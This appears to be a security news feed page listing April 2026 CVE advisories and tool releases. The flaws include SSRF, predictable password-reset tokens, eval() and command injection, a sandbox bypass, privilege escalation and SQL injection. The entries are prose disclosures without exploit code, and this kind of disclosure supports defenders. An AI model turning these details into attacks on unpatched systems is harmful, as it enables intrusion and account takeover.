2026-04-10
2026-04-10 20:16Z
HIGH

CVE-2026-40168 — Gitroom Postiz: Prior to 2.21.5, the /api/public/stream endpoint is vulnerable to SSRF.

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-40168

Postiz is an AI social media scheduling tool. Prior to 2.21.5, the /api/public/stream endpoint is vulnerable to SSRF. Although the application validates the initially supplied URL and blocks direct private/internal hosts, it does not re-validate the final destination after HTTP redirects. As a result, an attacker can supply a public HTTPS URL that passes validation and then redirects the server-side request to an internal resource. CVSSv3.1 8.2 (HIGH)

CWECWE 918VNDGitroomVNDPostizTYPVulnerability
8.2
CVSS v3.1
91
Edit Score
2026-04-10
2026-04-10 20:16Z
CRIT

CVE-2026-30232 — Depomo Chartbrew: Prior to 4.8.5, Chartbrew allows authenticated users to create API data connections with arbitrary

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-30232

Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.8.5, Chartbrew allows authenticated users to create API data connections with arbitrary URLs. The server fetches these URLs using request-promise without any IP address validation, enabling Server-Side Request Forgery attacks against internal networks and cloud metadata endpoints. This vulnerability is fixed in 4.8.5. CVSSv3.1 9.6 (CRITICAL)

CWECWE 918VNDDepomoVNDChartbrewTYPVulnerability
9.6
CVSS v3.1
98
Edit Score
2026-04-10
2026-04-10 19:16Z
CRIT

CVE-2026-33707 — Chamilo: Prior to 1.11.38 and 2.0.0-RC.3, the default password reset mechanism generates tokens using sha1($email)

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-33707

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, the default password reset mechanism generates tokens using sha1($email) with no random component, no expiration, and no rate limiting. An attacker who knows a user's email can compute the reset token and change the victim's password without authentication. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. CVSSv3.1 9.4 (CRITICAL)

CWECWE 640VNDChamiloTYPVulnerability
9.4
CVSS v3.1
97
Edit Score
2026-04-10
2026-04-10 19:16Z
HIGH

CVE-2026-33618 — Chamilo: Prior to .0.0-RC.3, the PlatformConfigurationController::decodeSettingArray() method uses PHP's eval() to parse platform settings from

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-33618

Chamilo LMS is a learning management system. Prior to .0.0-RC.3, the PlatformConfigurationController::decodeSettingArray() method uses PHP's eval() to parse platform settings from the database. An attacker with admin access (obtainable via Advisory 1) can inject arbitrary PHP code into the settings, which is then executed when any user (including unauthenticated) requests /platform-config/list. This vulnerability is fixed in 2.0.0-RC.3. CVSSv3.1 8.8 (HIGH)

CWECWE 95VNDChamiloTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-10
2026-04-10 19:11Z
HIGH

Metasploit Wrap-Up 10/04/2026

Rapid7 Research·rapid7.comCVE-2026-20127CVE-2026-22200in the wild

Metasploit Framework 6.4.126 adds four new modules including an authentication bypass for Cisco Catalyst SD-WAN controllers (CVE-2026-20127, recently exploited in the wild), an arbitrary file read in osTicket via PHP filter chains (CVE-2026-22200), and AD/CS web enrollment certificate issuance. The release also includes a 2x speedup to msfvenom startup time and enhancements to LDAP/ADCS reporting and Windows S4U persistence techniques.

SRFApplicationSRFOsTACTA0004TACTA0005SRFNetwork ApplianceTACTA0006TACTA0007TACTA0003
72
Edit Score
2026-04-10
2026-04-10 18:16Z
HIGH

CVE-2026-5483 — This vulnerability in the `odh-dashboard` component of Red Hat OpenShift AI (RHOAI) allows for

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-5483

A flaw was found in odh-dashboard in Red Hat Openshift AI. This vulnerability in the `odh-dashboard` component of Red Hat OpenShift AI (RHOAI) allows for the disclosure of Kubernetes Service Account tokens through a NodeJS endpoint. This could enable an attacker to gain unauthorized access to Kubernetes resources. CVSSv3.1 8.5 (HIGH)

CWECWE 201TYPVulnerability
8.5
CVSS v3.1
93
Edit Score
2026-04-10
2026-04-10 18:16Z
HIGH

CVE-2026-40163 — Saltcorn: Prior to 1.4.5, 1.5.5, and 1.6.0-beta.4, the POST /sync/offline_changes endpoint allows an unauthenticated attacker

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-40163

Saltcorn is an extensible, open source, no-code database application builder. Prior to 1.4.5, 1.5.5, and 1.6.0-beta.4, the POST /sync/offline_changes endpoint allows an unauthenticated attacker to create arbitrary directories and write a changes.json file with attacker-controlled JSON content anywhere on the server filesystem. The GET /sync/upload_finished endpoint allows an unauthenticated attacker to list arbitrary directory contents and read specific JSON files. This vulne CVSSv3.1 8.2 (HIGH)

CWECWE 22VNDSaltcornTYPVulnerability
8.2
CVSS v3.1
91
Edit Score
728 × 90 / responsive · programmatic ad slot
2026-04-10
2026-04-10 18:16Z
CRIT

CVE-2026-32892 — Chamilo: Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an OS Command Injection vulnerability in

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-32892

Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an OS Command Injection vulnerability in the file move function. The move() function in fileManage.lib.php passes user-controlled path values directly into exec() shell commands without using escapeshellarg(). When a user moves a document via document.php, the move_to POST parameter — which only passes through Security::remove_XSS() (an HTML-only filter) — is concatenated direct CVSSv3.1 9.1 (CRITICAL)

CWECWE 78VNDChamiloTYPVulnerability
9.1
CVSS v3.1
96
Edit Score
2026-04-10
2026-04-10 18:16Z
HIGH

CVE-2026-31939 — Chamilo: Prior to 1.11.38, there is a path traversal in main/exercise/savescores.php leading to arbitrary file

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-31939

Chamilo LMS is a learning management system. Prior to 1.11.38, there is a path traversal in main/exercise/savescores.php leading to arbitrary file feletion. User input from $_REQUEST['test'] is concatenated directly into filesystem path without canonicalization or traversal checks. This vulnerability is fixed in 1.11.38. CVSSv3.1 8.3 (HIGH)

CWECWE 22CWECWE 73VNDChamiloTYPVulnerability
8.3
CVSS v3.1
92
Edit Score
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-40200 — Stack-based memory corruption can occur during qsort of very large arrays, due to incorrectly

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-40200

An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory corruption can occur during qsort of very large arrays, due to incorrectly implemented double-word primitives. The number of elements must exceed about seven million, i.e., the 32nd Leonardo number on 32-bit platforms (or the 64th Leonardo number on 64-bit platforms, which is not practical). CVSSv3.1 8.1 (HIGH)

CWECWE 670TYPVulnerability
8.1
CVSS v3.1
91
Edit Score
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-40158 — PraisonAI: Prior to 4.5.128, PraisonAI's AST-based Python sandbox can be bypassed using type.__getattribute__ trampoline, allowing

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-40158

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI's AST-based Python sandbox can be bypassed using type.__getattribute__ trampoline, allowing arbitrary code execution when running untrusted agent code. The _execute_code_direct function in praisonaiagents/tools/python_tools.py uses AST filtering to block dangerous Python attributes like __subclasses__, __globals__, and __bases__. However, the filter only checks ast.Attribute nodes, allowing a bypass. The san CVSSv3.1 8.6 (HIGH)

CWECWE 94CWECWE 693VNDPraisonaiTYPVulnerability
8.6
CVSS v3.1
93
Edit Score
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-40157 — Praison Praisonai: Prior to 4.5.128, cmd_unpack in the recipe CLI extracts .praison tar archives using raw

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-40157

PraisonAI is a multi-agent teams system. Prior to 4.5.128, cmd_unpack in the recipe CLI extracts .praison tar archives using raw tar.extract() without validating archive member paths. A .praison bundle containing ../../ entries will write files outside the intended output directory. An attacker who distributes a malicious bundle can overwrite arbitrary files on the victim's filesystem when they run praisonai recipe unpack. This vulnerability is fixed in 4.5.128. CVSSv3.1 8.8 (HIGH)

CWECWE 22VNDPraisonVNDPraisonaiTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-35669 — Openclaw Openclaw: before 2026.3.25 contains a privilege escalation vulnerability in gateway-authenticated plugin HTTP routes that

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35669

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in gateway-authenticated plugin HTTP routes that incorrectly mint operator.admin runtime scope regardless of caller-granted scopes. Attackers can exploit this scope boundary bypass to gain elevated privileges and perform unauthorized administrative actions. CVSSv3.1 8.8 (HIGH)

CWECWE 648VNDOpenclawTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-35666 — Openclaw Openclaw: before 2026.3.22 contains an allowlist bypass vulnerability in system.run approvals that fails to

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35666

OpenClaw before 2026.3.22 contains an allowlist bypass vulnerability in system.run approvals that fails to unwrap /usr/bin/time wrappers. Attackers can bypass executable binding restrictions by using an unregistered time wrapper to reuse approval state for inner commands. CVSSv3.1 8.8 (HIGH)

CWECWE 706VNDOpenclawTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-35663 — Openclaw Openclaw: before 2026.3.25 contains a privilege escalation vulnerability allowing non-admin operators to self-request broader

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35663

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability allowing non-admin operators to self-request broader scopes during backend reconnect. Attackers can bypass pairing requirements to reconnect as operator.admin, gaining unauthorized administrative privileges. CVSSv3.1 8.8 (HIGH)

CWECWE 648VNDOpenclawTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-35660 — Openclaw Openclaw: before 2026.3.23 contains an insufficient access control vulnerability in the Gateway agent /reset

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35660

OpenClaw before 2026.3.23 contains an insufficient access control vulnerability in the Gateway agent /reset endpoint that allows callers with operator.write permission to reset admin sessions. Attackers with operator.write privileges can invoke /reset or /new messages with an explicit sessionKey to bypass operator.admin requirements and reset arbitrary sessions. CVSSv3.1 8.1 (HIGH)

CWECWE 862VNDOpenclawTYPVulnerability
8.1
CVSS v3.1
91
Edit Score
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-35653 — Openclaw Openclaw: before 2026.3.24 contains an incorrect authorization vulnerability in the POST /reset-profile endpoint that

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35653

OpenClaw before 2026.3.24 contains an incorrect authorization vulnerability in the POST /reset-profile endpoint that allows authenticated callers with operator.write access to browser.request to bypass profile mutation restrictions. Attackers can invoke POST /reset-profile through the browser.request surface to stop the running browser, close Playwright connections, and move profile directories to Trash, crossing intended privilege boundaries. CVSSv3.1 8.1 (HIGH)

CWECWE 863VNDOpenclawTYPVulnerability
8.1
CVSS v3.1
91
Edit Score
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-35643 — Openclaw Openclaw: before 2026.3.22 contains an unvalidated WebView JavascriptInterface vulnerability allowing attackers to inject arbitrary

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35643

OpenClaw before 2026.3.22 contains an unvalidated WebView JavascriptInterface vulnerability allowing attackers to inject arbitrary instructions. Untrusted pages can invoke the canvas bridge to execute malicious code within the Android application context. CVSSv3.1 8.8 (HIGH)

CWECWE 940VNDOpenclawTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-10
2026-04-10 17:17Z
HIGH

CVE-2026-35595 — Vikunja: Prior to 2.3.0, the CanUpdate check at pkg/models/project_permissions.go:139-148 only requires CanWrite on the new

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-35595

Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the CanUpdate check at pkg/models/project_permissions.go:139-148 only requires CanWrite on the new parent project when changing parent_project_id. However, Vikunja's permission model uses a recursive CTE that walks up the project hierarchy to compute permissions. Moving a project under a different parent changes the permission inheritance chain. When a user has inherited Write access (from a paren CVSSv3.1 8.3 (HIGH)

CWECWE 269VNDVikunjaTYPVulnerability
8.3
CVSS v3.1
92
Edit Score
2026-04-10
2026-04-10 16:16Z
CRIT

CVE-2026-23781 — BMC: If left unchanged, these credentials can be easily obtained and may allow unauthorized access

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-23781

An issue was discovered in BMC Control-M/MFT 9.0.20 through 9.0.22. A set of default debug user credentials is hardcoded in cleartext within the application package. If left unchanged, these credentials can be easily obtained and may allow unauthorized access to the MFT API debug interface. CVSSv3.1 9.8 (CRITICAL)

CWECWE 798VNDBmcTYPVulnerability
9.8
CVSS v3.1
99
Edit Score
2026-04-10
2026-04-10 15:57Z
INFO

Z-Hound — Single-file, browser-based Active Directory attack graph tool for SharpHound and AzureHound collection data. No server.

GitHub · AD attack tooling·github.comGITHUB POC

Z-Hound is a single-file, browser-based Active Directory attack graph visualization tool that parses SharpHound and AzureHound collection data without requiring Neo4j, server infrastructure, or installation. It provides interactive graph rendering, automated risk scoring, attack path analysis, NTLM relay chain synthesis, ADCS ESC detection, and Azure/Entra ID support—all processing occurs client-side in the browser with no data exfiltration.

SRFOsTACTA0006TACTA0007SRFIdentityVNDMicrosoftTYPResearchTYPToolSTGDiscovery
78
Edit Score
2026-04-10
2026-04-10 15:36Z
INFO

v3.4.0.56

Mythic releases·github.com

Mythic v3.4.0.56 released with a Dockerfile tag bump to match the release version. No detailed changelog or feature notes are provided in the GitHub release page.

VNDMythicTYPTool
15
Edit Score
2026-04-10
2026-04-10 15:16Z
CRIT

CVE-2026-36236 — Janobe Engineers_online_portal: SourceCodester Engineers Online Portal v1.0 is vulnerable to SQL Injection in update_password.php via the

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-36236

SourceCodester Engineers Online Portal v1.0 is vulnerable to SQL Injection in update_password.php via the new_password parameter. CVSSv3.1 9.8 (CRITICAL)

CWECWE 89VNDJanobeVNDSourcecodesterTYPVulnerability
9.8
CVSS v3.1
99
Edit Score
2026-04-10
2026-04-10 15:16Z
CRIT

CVE-2026-36235 — Itsourcecode Online_student_enrollment_system: A SQL injection vulnerability was found in the scheduleSubList.php file of itsourcecode Online Student

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-36235

A SQL injection vulnerability was found in the scheduleSubList.php file of itsourcecode Online Student Enrollment System v1.0. The reason for this issue is that the 'subjcode' parameter is directly embedded into the SQL query via string interpolation without any sanitization or validation. CVSSv3.1 9.8 (CRITICAL)

CWECWE 89VNDItsourcecodeTYPVulnerability
9.8
CVSS v3.1
99
Edit Score
2026-04-10
2026-04-10 15:16Z
CRIT

CVE-2026-36234 — Itsourcecode Online_student_enrollment_system: Online Student Enrollment System v1.0 is vulnerable to SQL Injection in newCourse.php via

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-36234

itsourcecode Online Student Enrollment System v1.0 is vulnerable to SQL Injection in newCourse.php via the 'coursename' parameter. CVSSv3.1 9.8 (CRITICAL)

CWECWE 89VNDItsourcecodeVNDOnlineTYPVulnerability
9.8
CVSS v3.1
99
Edit Score